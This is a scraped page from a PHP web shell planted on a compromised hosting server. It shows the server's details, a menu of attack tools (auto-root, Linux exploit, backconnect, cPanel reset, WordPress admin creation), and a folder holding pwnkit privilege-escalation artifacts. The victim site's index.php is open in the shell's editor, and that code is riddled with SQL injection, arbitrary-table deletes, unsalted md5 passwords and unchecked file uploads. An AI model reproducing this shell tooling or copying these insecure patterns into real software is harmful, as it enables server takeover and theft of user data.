Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 18.119.128.75
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
CMS /
php /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
index.php
8.25
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.php
<?php include'../include/dbconnect.php'; date_default_timezone_set('Asia/Kolkata'); $date = date('d-m-Y H:i:s'); $date1 = date('d-m-Y'); $caseno = base64_decode($_POST['caseno']); if($caseno=='1') { $sql = mysqli_query($conn,"SELECT * FROM user_details WHERE email='".mysqli_escape_string($conn,trim($_POST['email']))."'"); if(mysqli_num_rows($sql)>0) { $data = array('code' =>'2' ,'msg'=>'Email already exists.' ); } else { $res = mysqli_query($conn,"INSERT INTO user_details SET name='".mysqli_escape_string($conn,trim($_POST['username']))."', email='".mysqli_escape_string($conn,trim($_POST['email']))."', mobile='".mysqli_escape_string($conn,trim($_POST['mobile']))."', company_name='".mysqli_escape_string($conn,trim($_POST['company_name']))."', password='".mysqli_escape_string($conn,trim(md5($_POST['password'])))."', create_at='".mysqli_escape_string($conn,$date1)."', update_at='".mysqli_escape_string($conn,$date1)."'"); if($res) { $data = array('code' =>'1' ,'msg'=>'Account created successfully.' ); } else { $data = array('code' =>'2' ,'msg'=>'Somting is wrong. Please try again.' ); } } echo json_encode($data); } if($caseno=='2') { $sql = mysqli_query($conn,"SELECT * FROM user_details WHERE email='".mysqli_escape_string($conn,trim($_POST['user_mail']))."' AND password='".mysqli_escape_string($conn,trim(md5($_POST['uspsd'])))."'"); if(mysqli_num_rows($sql)>0) { $res1 = mysqli_fetch_array($sql); if($res1['status']=='1') { session_start(); $_SESSION['user']=$res1['id']; $data = array('code' =>'1' ,'msg'=>'Login successfully.' ); } else { $data = array('code' =>'2' ,'msg'=>'Your account has been disabled. Please contact your system administrator.' ); } } else { $data = array('code' =>'2' ,'msg'=>'The username or password is incorrect.' ); } echo json_encode($data); } if($caseno=='3') { if($_FILES['files']["name"][0] !='') { $ext = pathinfo($_FILES['files']['name'], PATHINFO_EXTENSION); $filename = 'user'.$_POST['user_id'].time().'.'.$ext; $tempname=$_FILES['files']['tmp_name']; $sql1 = mysqli_query($conn,"update user_details set name= '".mysqli_escape_string($conn,trim($_POST['usr_name']))."', company_name='".mysqli_escape_string($conn,trim($_POST['company_name']))."', image='$filename ' where id='".$_POST['user_id']."'"); if($sql1) { move_uploaded_file($tempname,'../assets/images/user/'.$filename); $data = array('code' =>'1' ,'msg'=>'Profile updated Successfully.' ); } else { $data = array('code' =>'2' ,'msg'=>'Somting is wrong. Please try again..' ); } } else { $sql1 = mysqli_query($conn,"update user_details set name= '".mysqli_escape_string($conn,trim($_POST['usr_name']))."',company_name='".mysqli_escape_string($conn,trim($_POST['company_name']))."' where id='".$_POST['user_id']."'"); if($sql1) { $data = array('code' =>'1' ,'msg'=>'Profile updated Successfully.' ); } else { $data = array('code' =>'2' ,'msg'=>'Somting is wrong. Please try again..' ); } } echo json_encode($data); } if($caseno=='4') { $old_pass = $_POST['old_psd']; $new_pass = $_POST['new_psd']; $con_pass = $_POST['conf_psd']; $res = mysqli_fetch_array(mysqli_query($conn,"SELECT * FROM user_details WHERE id='".mysqli_escape_string($conn,trim($_POST['user_id']))."'")); if($new_pass !=$con_pass) { $data = array('code' =>'2' ,'msg'=>'Confirm password did not match. Please try again.' ); } else if(md5($_POST['old_psd']) !=$res['password']) { $data = array('code' =>'2' ,'msg'=>'Old password did not match. Please try again.' ); } else { $sql = mysqli_query($conn,"update user_details set password='".mysqli_escape_string($conn,trim(md5($_POST['new_psd'])))."'"); if($sql) { $data = array('code' =>'1' ,'msg'=>'Password changed Successfully.' ); } else { $data = array('code' =>'2' ,'msg'=>'Somting is wrong. Please try again' ); } } echo json_encode($data); } if($caseno=='5') { $table = $_POST['table']; $id = $_POST['link']; if($_POST['status']=='1') { mysqli_query($conn,"update user_details set status='0' where id='".$id."'"); echo '<button type="button" class="btn btn-outline-danger mb-1 mb-md-0 chng_st" data-id="'.$id.'" data-idd="0">DeAcivate User</button>'; } else { $sql = mysqli_query($conn,"update user_details set status='1' where id='".$id."'"); echo '<button type="button" class="btn btn-outline-success mb-1 mb-md-0 chng_st" data-id="'.$id.'" data-idd="1" >Acivate User</button>'; } } if($caseno=='6') { $sql = mysqli_query($conn,"select * from service_category where category_name='".$_POST['category_name']."'"); if(mysqli_num_rows($sql)>0) { $data = array('code' =>'2' ,'msg'=>'Category name already exists.' ); } else { $res = mysqli_query($conn,"INSERT INTO service_category set category_name='".mysqli_escape_string($conn,trim($_POST['category_name']))."', created_at='".mysqli_escape_string($conn,trim($date1))."'"); if($res) { $data = array('code' =>'3' ,'msg'=>'Category added Successfully.' ); } else { $data = array('code' =>'2' ,'msg'=>'Somting is wrong. Please try again' ); } } echo json_encode($data); } if($caseno=='7') { $res = mysqli_query($conn,"UPDATE service_category set category_name='".mysqli_escape_string($conn,trim($_POST['category_name']))."' WHERE id='".$_POST['uid']."'"); if($res) { $data = array('code' =>'3' ,'msg'=>'Category updated Successfully.' ); } else { $data = array('code' =>'2' ,'msg'=>'Somting is wrong. Please try again' ); } echo json_encode($data); } if($caseno=='8') { $table = $_POST['table']; $id = $_POST['link']; if($_POST['status']=='1') { mysqli_query($conn,"update service_category set status='0' where id='".$id."'"); echo '<button type="button" class="btn btn-outline-danger mb-1 mb-md-0 chng_st" data-id="'.$id.'" data-idd="0">DeAcivate</button>'; } else { $sql = mysqli_query($conn,"update service_category set status='1' where id='".$id."'"); echo '<button type="button" class="btn btn-outline-success mb-1 mb-md-0 chng_st" data-id="'.$id.'" data-idd="1" >Acivate</button>'; } } if($caseno=='9') { $table = $_POST['table']; $res=mysqli_query($conn,"DELETE FROM $table WHERE id='".$_POST['id']."'"); if($res) { echo '1'; } else { echo '0'; } } if($caseno=='10') { $sql = mysqli_query($conn,"select * from assign_list where user_id='".$_POST['user_id']."' AND category_id='".$_POST['category_id']."'"); if(mysqli_num_rows($sql)>0) { $data = array('code' =>'2' ,'msg'=>'This service already assigned.' ); } else { $res = mysqli_query($conn,"INSERT INTO assign_list set user_id='".mysqli_escape_string($conn,trim($_POST['user_id']))."', category_id='".mysqli_escape_string($conn,trim($_POST['category_id']))."', created_at='".mysqli_escape_string($conn,trim($date1))."'"); if($res) { $data = array('code' =>'4' ,'msg'=>'Srevice assign Successfully.' ); } else { $data = array('code' =>'2' ,'msg'=>'Somting is wrong. Please try again' ); } } echo json_encode($data); } if($caseno=='12') { $table = $_POST['table']; $id = $_POST['link']; if($_POST['status']=='1') { mysqli_query($conn,"update assign_list set status='0' where id='".$id."'"); echo '<button type="button" class="btn btn-outline-danger mb-1 mb-md-0 chng_st" data-id="'.$id.'" data-idd="0">DeAcivate</button>'; } else { $sql = mysqli_query($conn,"update assign_list set status='1' where id='".$id."'"); echo '<button type="button" class="btn btn-outline-success mb-1 mb-md-0 chng_st" data-id="'.$id.'" data-idd="1" >Acivate</button>'; } } ?>
Close
